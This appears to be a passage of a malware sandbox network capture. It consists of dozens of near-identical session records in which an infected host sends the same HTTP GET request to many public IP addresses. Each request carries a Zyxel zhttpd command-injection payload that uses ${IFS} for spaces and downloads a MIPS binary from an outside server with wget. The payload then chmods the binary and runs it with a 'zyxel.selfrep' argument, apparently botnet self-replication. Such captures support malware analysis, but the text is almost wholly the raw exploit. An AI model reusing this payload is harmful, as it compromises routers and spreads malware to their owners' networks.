                                                Jan 12, 2024 18:24:36.876792908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4726192.168.2.1355368221.241.46.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876821041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4727192.168.2.134140074.41.84.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876858950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4728192.168.2.134509219.225.2.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876885891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4729192.168.2.135408688.110.130.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876918077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4730192.168.2.1359032100.5.198.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.876971006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4731192.168.2.1343796185.121.101.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877013922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4732192.168.2.134819882.154.210.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877037048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4733192.168.2.134668219.211.32.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877103090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4734192.168.2.135029241.169.173.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877109051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4735192.168.2.1359332216.180.66.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877146959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4736192.168.2.1349234113.158.184.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877201080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4737192.168.2.1351684210.152.176.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877238035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4738192.168.2.133284227.113.195.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877274990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4739192.168.2.13341244.121.190.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877322912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4740192.168.2.1350186181.229.221.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877345085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4741192.168.2.1353886192.4.163.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877393961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4742192.168.2.135698895.231.20.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877434969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4743192.168.2.1334176205.119.111.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877484083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4744192.168.2.1358678183.203.16.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877525091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4745192.168.2.1356392133.46.211.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877557993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4746192.168.2.134189237.98.161.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877594948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4747192.168.2.1345064147.169.94.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877651930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4748192.168.2.1335862120.155.229.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877687931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4749192.168.2.1336026195.148.65.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877696991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4750192.168.2.134495641.38.72.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877746105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4751192.168.2.1345918174.176.45.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877779007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4752192.168.2.1333894161.152.222.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877799034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4753192.168.2.1333428134.93.205.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877835989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4754192.168.2.1343428169.143.198.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877868891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4755192.168.2.1333786188.8.241.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877897024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4756192.168.2.135121250.252.91.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877933979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4757192.168.2.1353288204.208.68.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.877975941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4758192.168.2.13499809.226.103.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.878015995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4759192.168.2.1333966133.72.77.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.878036022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4760192.168.2.1339536137.180.188.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.878083944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4761192.168.2.134850857.33.39.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.878118992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4762192.168.2.134888223.26.105.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.878165960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4763192.168.2.134068265.44.226.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.878218889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4764192.168.2.135108420.134.209.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.878258944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4765192.168.2.133719836.188.200.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882312059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4766192.168.2.1333510220.220.216.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882373095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4767192.168.2.1355794166.164.238.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882385969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4768192.168.2.1341472209.135.182.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882435083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4769192.168.2.1333154143.88.32.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882472038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4770192.168.2.134690232.184.122.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882498026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4771192.168.2.1344868109.244.247.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882558107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4772192.168.2.135740038.28.235.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882584095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4773192.168.2.135296084.114.50.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882625103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4774192.168.2.1347668151.19.238.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882679939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4775192.168.2.134267446.158.187.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882705927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4776192.168.2.1360204213.92.241.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882750034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4777192.168.2.1344730212.194.209.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882772923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4778192.168.2.133815024.37.162.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882822990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4779192.168.2.134004876.205.134.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882865906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4780192.168.2.13502085.33.20.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882893085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4781192.168.2.1350678223.242.148.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882935047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4782192.168.2.133400818.120.66.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.882975101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4783192.168.2.1355394194.198.37.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.883008003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4784192.168.2.1354762163.159.201.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.883038998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4785192.168.2.134607480.67.80.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.883085012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4786192.168.2.1339008186.18.27.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.886374950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4787192.168.2.134212079.214.109.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.886380911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4788192.168.2.1351172101.65.88.234443
                                                TimestampBytes transferredDirectionData
